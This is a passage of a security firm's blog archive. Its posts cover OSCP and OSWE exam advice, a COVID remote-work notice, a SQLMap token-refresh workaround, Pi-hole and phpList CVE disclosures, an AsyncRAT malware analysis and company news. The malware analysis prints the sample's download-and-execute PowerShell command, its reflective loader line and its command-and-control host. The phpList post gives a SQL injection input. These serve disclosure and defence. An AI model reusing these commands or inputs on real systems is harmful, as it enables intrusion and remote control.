This requires a lot of hard work and dedication - and comes back to what I said in the very beginning about passion for this as a career, not a nine-to-five 'job'. Your attitude has to be the former to make tangible progress.

As far as actual OSCP preparation goes: this my advice in a nutshell:

Read through the PDF manual. OffSec are trying to teach you certain principles contained in that document - so do not toss it aside.
Manage your time carefully, because you get to keep the PDF, but your lab-time is ticking.
Choose the longest lab-time package as possible (or that you feel is suitable, depending on your skill level).
Spend as much time practicing in the labs as you can.
Exploit manually, rather than relying on Metasploit. You will thank me when it comes to exam time and to your actual assessments in real life!
If your lab time runs out, consider extending it or signing up for a paid subscription like Hack the Box.
Have you Googled it?
Keep at it, if that isn't working then you need to Try Harder!

Passing the PWK exam to become OSCP certified is no easy task. There is a lot to learn, and the actual exam is 24hours long, with a further 24hrs provided as Reporting Time. (NOTE: The PWK was updated last week, and the course structure has changed. There may be changes to the exam too that I am not aware of).

This is arduous, just because of the sheer length of the exam. So I recommend that you write this in a space where you feel comfortable, where you know you will have uninterrupted access to electricity and Wi-Fi (a real problem in South Africa unfortunately), have plenty of snacks, and finally - my mentor Dino Covotsos gave the great advice to take breaks and rest.

It can be easy to get fixated on a rabbit hole, and lose hours of time trying to get one thing to work. You will be amazed at the other possibilities that pop into your head during a short walk or nap!

Failing

This is a hard one to talk about, but something worth consideration BEFORE your first attempt.

There are people who do pass on their first attempt - I was not one of those people. If, like me, you fail an attempt at the OSCP (or any exam for that matter), being able to identify your weaknesses so that you can improve upon them means that you are still able to gain something from the experience.

However, failing was not something I was used to. It can be very discouraging and make you feel like you're not capable, smart enough, or meant for this industry; and it is admittedly difficult to keep those mind-monsters in check sometimes. Thankfully, some of the most talented people in the industry have openly admitted to feeling like they are failures, suffer from imposter syndrome and often feel demotivated.

It is absolutely normal to feel a bit rubbish after failing, but this is where your passion enters the equation again. Where you refuse to lose! Give yourself some time to accept failure, then pick yourself up and figure out your game-plan. All part of what we learnt during the internship process with Telspace Systems initially.

It is not possible to be good at everything, and it takes time and effort to learn any skill - thank you Dino Covotsos and Manuel Corregedor for encouraging me not to shy away from my weaknesses - keep learning and practicing.

FAILURE TLDR:

Failing sucks, but figure out where you need to improve.
Keep at it!

Passing

Nothing on earth could compare to the feeling you get when you open the email from Offensive Security and see it starts with "We are happy to inform you...".

The hours of work, the dedication, the proverbial 'blood, sweat and tears' - are well worth it.

PASSING TLDR:

Passing is AWESOME, but never stop learning.
Keep at it!

Telspace Systems have given me a wonderful opportunity, which I am incredibly grateful for. I was delighted to be one of the analysts involved in our current Internship program, and to be able to pass some of my knowledge on to those hungry to learn.

Thank you to every single person who has been part of my journey. To those who have taught me, to those who have underestimated me and said I did not deserve this (because you made me fight for it harder), but mostly to those who understand that to achieve great things takes immense hard work and lead by fantastic example.

Post by Amy Manià

↧

COVID-19 – Closed Offices

March 15, 2020, 2:03 pm

≫ Next: Bypassing refresh tokens with SQLMap’s tamper scripts

≪ Previous: From Intern to OSCP Certified

At Telspace we put our employees, clients, community and country first in everything we do. In line with this, we have decided to close our physical offices and all our staff will be working remotely. By doing so, we can hopefully reduce the risk of COVID-19 further spreading. This post outlines why we are doing this and how this will affect our day to day operations and community engagements.

Why?

Surely this is an overreaction given we are company with less than a 100 people? Aren’t we just spreading more fear / panic? No and no. Won’t this result in a negative financial impact to Telspace? Potentially yes, due to factors outside of our control, but there are more important things happening right now and we will always ensure that our services meet the highest quality standards our clients have come to expect.

We want to be proactive in protecting ourselves and everyone else and therefore we call on companies in our industry and any other companies outside our industry that can do the same to follow suit, prevention is better than cure as the saying goes.

Telspace Conference 2020

Our client only conference was scheduled to take place on the 31^stof March and we were expecting a large number of attendees. We are excited to inform you that our conference will still be going ahead, albeit in a digital format as follows:

Our talks will now be given virtually and will be accessible to all our clients to log onto / participate in.

All swag / gifts that were going to be given out at the conference will instead be kept and distributed to clients once the pandemic has been resolved.

Key Account Managers

We love the personal touch that comes from meeting face to face with our clients, but with COVID-19 the less in-person meetings the safer. As such all our sales / key account managers will now be required to conduct meetings / catchups virtually via Google Hangouts, Skype, Zoom etc. For more sensitive conversations / discussions, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the meetings.

Security Assessments / Penetration Tests

The good news is that we are prepared for a remote working scenario and therefore will still be able to provide you with uninterrupted services of the highest quality. All of our assessments can be conducted remotely provided we are given VPN access to the client’s environments. Alternatively, we can provide clients with our own TelspaceConnect Boxes, which is essentially a box that allows us to connect remotely to a client’s network to conduct the assessment, just plug it into the network where it’s required and we will do the rest.

For more specialised assessments, we are happy to work with clients to find the best way to conduct the assessment.

Report presentations will be done virtually via Google Hangouts, Skype, Zoom etc. For more sensitive presentations, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the presentations.

Training

All of our training can be given virtually, in terms of assisting students with any issues they may have with the practical aspects of the training, a remote connection to the student’s computer / host would be required.

Conclusion

We would like to wish everyone the very best during this difficult time and we hope that you will be safe. We are confident that if we all work together proactively in preventing the spread of COVID-19, we will collectively be able to defeat it.

Dino, Manny and Tim (Telspace Management Team)

↧

Bypassing refresh tokens with SQLMap’s tamper scripts

May 20, 2020, 2:02 am

≫ Next: {Certification Review} - OSWE - Staff Review

≪ Previous: COVID-19 – Closed Offices

In this blog post, I will be taking you through how to make use of the “--tamper” parameter of the SQLMap tool to bypass the limitations of a web application using JWT tokens.

A function of web applications that use JWT tokens is to make the token expire after a certain period of time. This then results in you receiving an error 401 message in the web application, meaning that you don’t have the correct privileges to use that specific web application or endpoint.

During a recent assessment, I came across a web application, which made use of JWT tokens for its authentication process. After token expiry, a request should always be sent to the application to reauthorise access and get a new token.

When using SQLMap to test a web application against potential SQL injection vulnerabilities, this became an issue, as the application would re-authenticate and a new token was issued, which would then result in an error 401 message.

I came up with a solution to this problem when using SQLMap, by requesting a new token and then changing the authorisation header which would then result in this problem being bypassed.

Below is the example of how this was successfully achieved.

First the request for a new token was sent to the application:

As can be seen below, this request then responded back with JSON, containing an “access_token” which could then be used in the next request:

For the next step, I then used Python to recreate the POST request in a script. In the screenshot below, you can see the code that was used for the POST request:

In addition to the above code, the authorisation header should be rewritten with new information before every request that is sent by SQLMap, as can be seen below:

The full tamper script should then look like the code in the screenshot below:

Lastly, in the screenshot below you can see the command for executing the tamper script against a target using SQLMap(sqlmap -u https://url.com/ --tamper bypass.py):

At this point, requests are sent correctly by refreshing the token and you will no longer receive a 401 error message.

I hope you have found this information to be of a value and that it will assist you in future penetration tests.

- Blog post by Motaz of Telspace Systems.

↧

{Certification Review} - OSWE - Staff Review

May 28, 2020, 4:20 am

≫ Next: Pi-hole Code Injection – CVE-2020-14971– Story Time

≪ Previous: Bypassing refresh tokens with SQLMap’s tamper scripts

Recently, Offensive-Security released an online version of their certification called “Offensive Security Web Expert” aka OSWE. After having already experienced and successfully obtaining several other certifications from Offensive Security such as OSCP and OSCE, I was curious and intrigued to give the OSWE course a try as well.

I decided to choose the 2-month package option for the course called “Advanced Web Attacks and Exploitation” and due to other commitments I was able to request and was granted a minor 15 day extension.

After watching the videos and reading through the course material, I was very impressed by the content of the course, as it contained detailed information and analysis on certain in-depth attacks.

The course followed a white-box testing approach which was based on source code review, by reading the code of the web application in order to find and exploit potential vulnerabilities.

The course material included several labs with web application software installed on them and by following the content provided in the course material, exploiting the machines was relatively easy.

Before embarking on this course, I would recommend that you have a good understanding of the following skills:

1. Python scripting language:

The course will require you to have a solid understanding of, as well as experience with python scripting, as it is used for automating the process of exploiting vulnerabilities as well as automating exploits.

2. Other programming languages:

It is also very important to have basic knowledge and understanding of other programming languages such as C#, JavaScript and Java.

3. Prior experience with web application attacks:

Prior experience with web application attacks will also be very advantageous as you will be required to have strong knowledge and understanding of common modern web attacks. Personally, I would also highly recommend reading the book titled “Web Application Hacker’s Handbook” beforehand as its content will be very helpful during the course and thereafter.

4. Source code review:

One of the outcomes that this course will teach you is how to do Whitebox testing on web applications by reviewing and understanding the code of the application. Therefore, prior experience in doing source code review on web applications will be advantageous.

5. Web development experience:

Having prior experience with web development and the workings of web applications will also assist with successfully completing this course.

Course Overview:

After receiving the course materials, I began reading the book, watching videos and solving the exercises and milestones.

The first few chapters of the course were relatively basic but from Chapter 4 onwards it became far more advanced. Personally it was at this point that it really became fun, as the course delved deeper into advanced techniques and attacks types.

Offensive Security recommends that you try and solve the exercises and milestones as you progress through the chapters to ensure that you get a better grasp and understanding of the materials and also as proof that you have understood everything in that particular chapter.

Listed below, is a list of pros and cons to consider when deciding to take this course:

· PROS:

o Great for learning and advancing white box testing and source code review skills.

o The course covers advanced real-world vulnerabilities such as deserialization attacks and advanced techniques.

o The course covers a wide range of vulnerabilities and exploits, including medium, high and critical risk.

· CONS:

o Although the course covers many different attack types, there are a few that are not covered in the course, for example, XXE, SSRF, CSRF and SSTI.

o More exercise work and milestones would be advantageous to learners

The lab review:

The lab consisted of 5 machines which contained the web applications as discussed in the course material. Therefore, by going through the course material comprehensivly and successfully completing the course exercises and milestones, you should be able to successfully execute the necessary attacks and exploitation paths.

Personally, I would recommend practicing as much as possible before moving onto the exam, as this will help increase your skills and confidence.

The exam review:

The exam for the OSWE course is a 48 hour exam, which includes an additional 24 hours for writing your step by step report of the exam. As with all exams, I would recommend that you ensure that you get enough sleep to ensure that you are well rested and able to perform at your peak.

During the exam, I had not rested enough and it started to affect my performance, therefore my recommendation is that if you start feeling tired, go sleep for a bit and then resume as this will help you to think clearer.

A few other suggestions from my experience is to remember to get up and take a walk every few hours and don’t forget to take screenshots as you solve the challenges in the exam.

Lastly, try not to stress too much about the exam, try to think of it as a challenge that you are trying to solve, rather than an exam itself.

Important material to read before undertaking this course:

Below is a list of content material that I would recommend that you read and work through before you undertake the OSWE course:

“The Web Application hackers handbook” (https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)
https://github.com/swisskyrepo/PayloadsAllTheThings
Pentest monkey will be helpful for some reverse shell cheat sheets (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
Deserialization attacks on .NET (https://www.youtube.com/watch?v=eDfGpu3iE4Q)
Deserialization on several coding languages (https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)

Summary:

OSWE is a very good course for people looking to improve their source code review skills as well as learning how to detect bugs and vulnerabilities by searching for them in the code itself. I would recommend that you book your exam not long after your lab time ends, so that the information you have learned will be fresh and ready to be used. Overall I enjoyed my OSWE experience and would therefore recommend it to others.

- Blog post by Motaz of Telspace Systems

↧

Pi-hole Code Injection – CVE-2020-14971– Story Time

June 23, 2020, 2:01 am

≫ Next: phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time

≪ Previous: {Certification Review} - OSWE - Staff Review

A while ago, we had an internal discussion around people working from home and the technologies/products that could be implemented and/or bought to protect home users. This was due to the implementation of the nationwide lockdown which resulted in companies being forced to change their approach entirely to having employees work from home.

During this discussion the Pi-hole was mentioned. Pi-hole is a very popular option for the more “tech savvy” home user and generally, anyone that’s tired of being spammed with random adverts on every website. You can find more information about it here https://github.com/pi-hole/pi-hole/.

Since I had a Pi-hole installed already, I decided to take a look at this beautiful piece of ad blocking software in more detail, specifically reviewing the code and logic of the application. Because it’s Opensource and available freely, this was easily accomplished by downloading and installing the latest Pi-hole (v5.0 at the time).

It’s worth mentioning that a lot of vulnerabilities had already been found in this software, some overlapped with findings that I had found particularly during April and May, which were rightfully allocated to the first people that reported the issues. With that being said, the Pi-hole is a popular target for researchers and adds a lot of value to people’s home and small office environments, so the more findings and fixes the better. I also wanted to focus on the latest version because of this.

Initially, I had found a few critical security vulnerabilities but many had been found and fixed already and others eventually required local shell access in some form, some functionality had been changed over time, which solved those particular RCE issues too. So, I therefore looked at a few other vectors and decided to focus on one specific attack vector, which looked promising.

Backup Functions:

Settings.php has lots of functionality, one of which allows users to back up and restore (export and import) configurations of the Pi-hole with a limited set of files (teleporter tab).

This was interesting for me because when you export files, they are compressed in tar.gz format and saved. Upon decompression and by systematically reviewing each file that was saved, I found that there were several files which were useful and easy wins for RCE, in particular if no whitelisting and sanitising was taking place. However, those particular ones are not restored if you modify them, re-compress and upload to restore the backup.

In this instance though, the affected files I found are dnsmasq.d configuration files and the adlist.json file. The dnsmasq.d/04-pi-hole-static-dhcp.conf file allows static DHCP leases, which link to MAC, IP and host.

I modified the configuration file for dnsmasq.d initially, in which I added my own code for the host parameter. Once I did this, I recompressed the file accordingly and imported the file back in via teleporter:

Upon browsing to the static DHCP leases section of the Pi-hole web interface, I could see my code was executing correctly i.e. I had found a Code Injection vulnerability.

The same then applied to adlists.json and other parameters in other files, as all the files were not being properly checked upon upload, they also just overwrote whatever was previously there and therefore your code executed accordingly:

Browse to host/admin/groups-adlists.php and you should get the ‘Adam popup’:

There are more examples, however it’s more of the same as what has been discussed above. I would also like to mention, that the Pi-hole is an amazing piece of software, built by people who really care for the community, please support them and donate. All the responses (especially from Adam) were really quick and things were patched exceptionally quickly.

You can browse all the fixes, comments and progress of patching by going here:

https://github.com/pi-hole/AdminLTE/commit/c949516ee15fa6a9b0c8511cc4c4d6b0893f3e69

https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-640920508

https://github.com/pi-hole/AdminLTE/commit/8f6e1365b6dec0ae1aa0b0b15b102c9133f347e5

https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-643830404

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14971

↧

phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time

July 9, 2020, 2:06 am

≫ Next: Looking back on 2019 and 2020…

≪ Previous: Pi-hole Code Injection – CVE-2020-14971– Story Time

phpList is currently used in 73 countries and is a popular choice for sending email newsletters, marketing campaigns and announcements. It is accessible via web browsers and is Open Source (https://www.phplist.org), however a paid for version also exists as a service via https://www.phplist.com.

Given its wide use / adoption, I decided to take a look at phpList recently, in order to give back to the Open Source community.

I would also like to give credit to phpList for responding and patching very quickly, especially to Suela at phpList. A new version of the application is now available for download.

You can browse all the fixes, comments and patching by going to the following URLs:

· https://discuss.phplist.org/t/phplist-3-5-5-has-been-released/6377

· https://www.phplist.org/newslist/phplist-3-5-5-release-notes/

· https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15072

· https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15073

A walkthrough of the 2 identified vulnerabilities is given below:

1.) Code Injection via "Import administrators"

1.1) Click on "Config" then "Import administrators"

1.2) Edit a txt file to include basic headers and test (offline) as follows:

1.3) Click on "Choose File" and select the text file.

1.4) Click "Do Import"

Code Injection Triggered (not stored)

1.5) Go back to "Import administrators"

1.6) Untick "Test output:"

1.7) Click "Do Import" and you will get an import database error.

1.8) Edit the same text file and add another user as follows:

1.9) Go back to "Import administrators"

1.10) Click on "Choose File" and choose the text file.

1.11) Untick "Test output:"

1.12) Click "Do Import" and you will get more import database errors

1.13) Browse to "Subscribers" then "Subscriber Lists"

1.14) Click on the first one and you'll get a "hi" popup:

1.15) Go back and click on the second one and you'll get a cookie.

2.) Error based SQL Injection via "Import administrators"

2.1) Click on "Config" then "Import administrators"

2.2) Edit a txt file to include basic headers and text (offline) as follows

email loginname password

test2@test.com "'testsql test

2.3) Untick "Test output:"

2.4) Click on "Choose File" and choose the text file.

2.5) Click "Do Import" - you'll see the Error Based SQL injection.

Creative Commons - Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) - https://creativecommons.org/licenses/by-sa/4.0/

↧

Looking back on 2019 and 2020…

December 10, 2020, 5:38 am

≫ Next: Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks

≪ Previous: phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time

Every year we look back on the previous year and reflect on what happened, our achievements, lessons learnt etc. However, last year this fell through i.e. we did not look back on 2019 which is just as well given what happened / is happening in 2020 or maybe this is some version of the butterfly effect Ƹ̵̡Ӝ̵̨̄Ʒ (∩╹□╹∩)

Okay okay we are being a bit dramatic here but it is 2020 and anything is possible, besides our newly acquired l33t ASCII art one liners ᕕ(⌐■_■)ᕗ, here are some of the highlights over the last 2 years.

Internships / Bootcamps

We ran two successful internships / bootcamps, this is an important part of our strategy to contribute towards developing / nurturing local information skills in South Africa. For additional information on the two bootcamps that we ran in the past two years, refer to:

From the bootcamps we ran, we ended up hiring 5 new staff members that joined our team and are now on their way to achieving great things both at Telspace and in the community (watch this space).

Those that did not make it with us, in most of the cases, ended up finding jobs at other info sec companies and / or corporates which is the exact reason we started the bootcamp, to filter more people in to the industry as a whole, not just specifically at Telspace. We also assisted those that could not find anywhere to be placed, by sending their CVs to some of our customers and / or other competitors. Below are some pictures of the bootcamp:

2020 Bootcamp

2019 Bootcamp

Talks and Research

Over the last two years we have given a number of talks and facilitated training both locally and internationally, below are some of the highlights:

Training - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows

We gave this training at both DEF CON 1.0 China and DEF CON 27 - Vegas in 2019, it was presented by Dino and Manny, it was really great to meet up with all our friends at DEF CON and make new friends, hopefully in 2021 we will all be able to meet up again!

Undercover hackers on their way to DEFCON China (no black hoody = no hacking going on here)

Epic artwork, epic venue! #HackerVibes

The actual venue where we were presenting but we totally missed the entrance and went on an adventure, thank goodness for Grifter!

Our names in lights O_O

A full house for all our classes with great interactions and learning!

Party time, and man was it a party x_X

Thanks to all the trainers, organisers, volunteers and everyone that made DEFCON China 1.0 possible <3

Training – Ethical Hacking 101

Right after China we were off to sunny Tel Aviv in Israel for BSides Tel Aviv where we were sponsors and also, gave our ethical hacking 101 training course. The local Israel hacking community are really awesome and a 100% of the proceeds of our training course were given back to be used by the local BSides TLV community.

Some cool art work on Aviv Beach

Raul (left) and Manny (right), ready to present to the community

Packed house for the kick off of BSides TLV 2019

Aaaaaaaaaaaaaaaaaaaand guess where we are now, VEGAAAAAAS!

Here we gave our Hack to Basics training for our DEF CON workshop, got to catch up with old friends, make new friends, nothing else like DEF CON Vegas!

Students from one of our classes (the ones that wanted to be in the picture that is!).

#TheBadgeLife – we got to have them all (or at least some!).

Back to the Motherland

Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this, we started / established the DC2711 group in South Africa and had our first conference last year on the 5th of October 2019. The conference was completely FREE to attend (for the community) and allowed various international and local researchers to share their research, for a full list of who spoke, refer to https://www.dc2711.co.za/dc2711_Presentations.html. Attendees also got swag packs full of DC2711 goodies.

Jayson Street handing Dino the official DEF CON flag for the DC2711 Group

The official DC2711 sticker but more importantly, a coffeeeeee voucher :D

DC2711 Badges

Some official swag :D

Dino and Manny with their fun faces on :P

#DuckArmyInvasion

The core GOON team for DC2711 – thank you again!

We were also Gold Sponsors of BSides Cape Town 2019 and Amy’s talk was also accepted (this talk was first completed at DC2711)!

On our way to BSides Cape Town!!!!!

Amy Manià giving her talk “Put words in my mouth” although we all know it as the “deep throat” talk.

Amy’s talk is accessible online at https://www.youtube.com/watch?v=4R-g90lplco.

Research / Dropping them 0days

In 2019 and 2020 we discovered and reported on a number of vulnerabilities, some of the main ones being:

QNAP - CVE-2019-7181 (https://www.qnap.com/en/security-advisory/nas-201905-09)
phpList – CVE-2020-15072 & CVE-2020-15073 (https://blog.telspace.co.za/2020/07/phplist-cve-2020-15072-cve-2020-15073.html)
Pi-hole Code Injection – CVE-2020-14971 (https://blog.telspace.co.za/2020/06/pi-hole-code-injection-cve-2020-14971.html)

We also released a tool called Travesty, which is a directory and file enumeration tool (post exploitation). This can be downloaded at https://github.com/telspacesystems/travesty .

For additional information on these and others we released / published this year refer to https://blog.telspace.co.za/

During DEF CON Safe Mode (DC28) Greg, Amy and Derek presented at the “War Story Bunker” event (Friday 7th August 2020), which was a pentesting story that caused a lot of big laughs and surprised faces – unfortunately these are not recorded for various reasons, but more information about DC28 can be found at https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html .

Amy Mania also represented Telspace during a Woven Experiences podcast with Melissa Monnig, the interview can be listened to on Spotify at:

https://open.spotify.com/episode/4Co0Vo6xW3sziq77aWBa0Z?si=w_13wOjZRLyU1XvMGQHJNw .

Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.

Last but not least, our CEO and Founder (Dino Covotsos) is officially part of the DEF CON Review board (Talks and Workshops). This is a great achievement, in particular, representing South Africa at such an international level. More information can be found at: https://www.defcon.org/html/defcon-27/dc-27-cfp-review-board.html
In closing, we would like to thank everyone who made our 2019/2020 so amazing, a huge thank you to our staff, clients, employees, friends and most importantly the local and international Information Security community.
We wish you all the best and a prosperous year for 2021.

↧

Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks

April 1, 2021, 7:21 am

≫ Next: Reverse Engineering AsyncRat Payload

≪ Previous: Looking back on 2019 and 2020…

Amy Manià to Appear at The Boston Security Meetup in April 2021

SOUTH AFRICA, JOHANNESBURG – March 17 2021 – Telspace Systems, a provider of vendor-independent Information / Cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fake and Voice Cloning at the prestigious Boston Security Meeting in Cambridge, MA, in mid-April (date not yet finalised). The Meetup is a self-described “safe place” for InfoSec people to come meet like-minded people, share “cool ideas,” and discuss real issues.

The Boston area has one of the most diverse information security ecosystems in the world and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights to help prevent businesses from falling victim to cyber-attacks, deep fakes, and how to keep sensitive information safe.

“Telspace underscores its commitment to protecting our customer’s financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. “We see prevention as a vital aspect including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs). “

“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”

Ms. Manià’s body of research, entitled "Put Words In My Mouth" may be explored at the-munx.com. This links to one of her podcast appearances, a whitepaper, and recorded conference talks.

To learn more about Telspace Systems, please visit https://www.telspace.com/.

# # #

About Telspace Systems

Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including governmental, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resource, and ISP’s. To learn more, please visit Telspace Systems and follow us on LinkedIn, Facebook, and Twitter.

Media Contact for Telspace Systems:

Media Team

Tel: +27 10 590 6163

Email: services@telspace.com

↧

Reverse Engineering AsyncRat Payload

July 15, 2021, 4:55 am

≫ Next: A new era for Telspace

≪ Previous: Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks

As part of some current research that I am doing, I decided to analyse malicious samples in VBS and PS1 formats to understand what techniques APTs and malicious actors are using for obfuscation. This led me to discovering AsyncRAT which I reverse engineered and wanted to share my experiences / findings with the community.

AsyncRAT is the name of a remote access or administration tool which is used to control computers remotely. However, Chinese APT groups have been observed to be using this to perform various actions such as stealing personal information or sensitive details.

The sample that I used can be found at this link (uploaded on the 12th of July 2021): https://bazaar.abuse.ch/sample/ea477346ddead4bd4cb67cf81ca9e22f9bc6ebd57b24540e44abdecb7a3e539e/

This is a payload found in the wild that uses multiple obfuscation and file manipulation techniques as an end goal to download AsyncRAT for remote control.

The sample being analysed contains a VBS payload, the hashes can be seen in screenshot 1.1 below:

1.1

The contents of file.vbs contain PowerShell commands that have been obfuscated through techniques such as replacing and splitting strings in addition to downloading files as shown in screenshot 1.2.

1.2

The VBS payload executes through Wscript the command “powershell -Command (New-Object Net.WebClient.DownloadString(''https://bit.ly/3wylsze'')| IEX” , which will download the contents of the specified URL https://bit.ly/3wylsze and execute them in memory.

By browsing to this URL, you get redirected to https://biplabbiprodas.com/wp-content/themes/jackryan/languages/LzWZ0w70pWJ95p9s.jpg which is supposed to be a JPG image but it is not loading as shown in screenshot 1.3.

1.3

By downloading and inspecting the “picture” we realise it is PowerShell code (shown in 1.4).

1.4

The PowerShell that is executed in memory downloads multiple files, replaces and concatenates strings together and performs execution in memory.

In the beginning of the script a number of directories are created recursively in this location C:\ProgramData\Microsoft Arts\Start , as shown in the first highlight of screenshot 1.5.

Further in the script 3 actions are performed where it sets 3 locations

C:\ProgramData\Microsoft Arts\Start\
C:\Users\Public\
C:\Users\Public\

Obfuscated by replacing random strings between those location paths in the second highlight of 1.5.

Next the script downloads 3 files respectively in the above-mentioned path locations as a .lnk , .bat and .ps1 and executes the .lnk file.

1.5

The .lnk file is a shortcut that will execute the .bat file from the second location in 1.6.

1.6

The .bat file executes mshta command with parameters in the command line as vbscript:Execute, to execute through Wscript a PowerShell command in screenshot 1.7.

1.7

The PowerShell command de-obfuscated executes the powershell .ps1 file downloaded earlier with the command line parameter of bypassing the ExecutionPolicy for scripts.

powershell -ExecutionPolicyBypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1

The .ps1 script contains a short sleep command, 2 sets of shellcode and execution through assembly in the highlights of screenshot 1.8.

1.8

Each shellcode is obfuscated with a certain pattern that gets replaced with 0, by using find & replace, we get the original shellcodes. The shellcodes are strings, hence the function where they are called to be converted as bytes.

After they are converted as bytes, they are saved in Byte variables to be used further in the script.

Peculiar note here, it seems like the variable H5 is defined twice with the exact same payload, which is weird since it changes nothing (see 1.9).

In addition to all of the above, there is the execution of assembly in the last line by using the shellcodes and the variable called ali which sets as a string the aspnet_compiler.exe from the .NET framework.

Let’s try to obtain the binaries from those shellcodes, by saving them to a file after they are converted to bytes and remove the last line to avoid becoming a victim.

1.9

By obtaining the files, we perform some initial analysis on them:

1.10

We will return back to the .ps1 script soon since the last line executes those 2 binaries, but we need to realise what is happening, H5 is the one that gets loaded for assembly execution.

By loading the H5 payload in ILSpy we are presented with the below:

1.11

Instantly from the set of WINAPI calls being executed in screenshot 1.11, we realise that this is Process Hollowing injection, which makes perfect sense since the last line uses the aspnet_compiler.exe to execute this attack and instead executes the H6 binary, which is the actual malware.

The last command is:

[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6))

The H5 binary is loaded in memory and executes the function NET of VPNT.B with parameters aspnet_compiler.exe and the H6 binary as shown in screenshot 1.12.

1.12

Next, let’s have a look at what the actual malware can do.

The H6 binary is obfuscated and uses encryption through a key, has multiple evasion features against debugging, VMs (shown in screenshot 1.13), performs recon of the hosts for its hostname, AV product (shown in screenshot 1.14) etc.

1.13

1.14

Below you can see some of its features as shown in screenshot 1.15, as well as persistence through schedule tasks on logon, by executing a .bat file as shown in screenshot 1.16.

1.15

1.16

The malware tries to reach back to the C2 domain fat7e114.ddns.net on port 6666 but also tries to reach windowsupdate.com domain possibly for trying to look legitimate as is observed in screenshot 1.17.

1.17

In conclusion, according to public resources the H6 binary is AsyncRat.

- Blog post by Thanasis(trickster0) of Telspace Systems

↧

A new era for Telspace

May 10, 2022, 4:48 am

≫ Next: Boot Camp: 2022

≪ Previous: Reverse Engineering AsyncRat Payload

As Telspace celebrates its 20th anniversary of being in business, I consider myself lucky to have been the Founder and CEO of such an incredible company.

Being CEO and Founder, it’s always been a key goal of mine to give back to the community at large and more specifically the South African community. It’s not as easy to do so when you’re starting a business alone especially at 19 years old, with no experience (and no capital at all!), but we’ve always tried to do our part over the years. It’s been a pleasure to watch the South African community grow in the last 2 decades, seeing the difference between 2002 and 2022 is staggering for me.

Throughout all the ups and downs of running a business over the last 2 decades, giving back to the community by growing it within South Africa has brought me the most joy. Watching people that started their careers with us knowing very little to now having exceptional jobs at large (or small) corporate firms, gives me a lot of happiness. The same goes for our internship programs and other free community initiatives we have run with for information security education over the years.

With the above being said, it is also why we, as management, have decided to change the business and rebrand to Telspace Africa. Our rebranding and new leadership changes are in line with our new strategy to set the foundation for the next 20 years of Telspace Africa with a stronger and clearer focus on the African market.

It therefore gives me great pride to announce that Dr Manuel Corregedor will now be the Chief Executive Officer of Telspace Africa. Anyone that has met and knows Manuel well, will attest to what an incredible person he is. Particularly, a person of high integrity and character. In addition, he’s been a great friend to me, a mentor to countless students and staff, a phenomenal colleague, and his contributions to the information security sector in SA (and abroad) have been significant and are largely unmatched (except for a select few others in our country). I’m proud to not only know Manuel as a best friend, but also now have him as our CEO. Congratulations Manuel, you truly deserve it.

In line with our management change, Timothy Quintal has been promoted to Chief Operating Officer. Timothy (like Manuel) is an exceptionally strong leader, a strategic and critical thinker and has a strong focus on developing others. Timothy exudes positivity and has a strong focus on growing each individual at our company. Also, someone I’m proud to call a great friend.

We’ve also had other internal staff promotions in management positions internally, all with the best intentions for our staff and customers.

Lastly, my new role at Telspace Africa as Chairman, is overlooking and steering the company in the right direction and to serve on our board in the best possible way, encouraging growth not only for our company but again, in our community.

Thank you to all our customers and staff that have believed in us over the years, we look forward to serving you for the next 20 years and beyond.

-Dino Covotsos

↧

Boot Camp: 2022

July 7, 2022, 12:33 am

≫ Next: Boot Camp: 2023

≪ Previous: A new era for Telspace

Telspace Africa has kicked off its 2022 Boot Camp program with a fresh intake of interns. After approximately 60 grueling interviews, 3 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the Boot Camp, having completed several modules of the boot camp already!

We asked them for some feedback on their experience so far:

“The Telspace internship for me is fast paced, healthy work environment as an intern and needs you to always be on your toes. Whether you make mistakes or get it right first try, you keep pushing further” – Obakeng

“It involves tons of research and problem-solving. One moment, I am on top of the world as I would pwn the machines and the next, I am back to my sorrows. I still love it though” – Tswaitswai

“It has been an unbelievable experience so far. I have not only had the opportunity to expand my knowledge so vastly in such a short time but I have been afforded the opportunity to get to know and see first-hand what some of the country’s top security experts can do, which only adds to the excitement and motivation to become a part of this great team” - Jason

For those interested in entering the industry, we will be hosting more boot camps in the near future. If you would like to participate, please get in touch with us at recruitment@telspace.africa

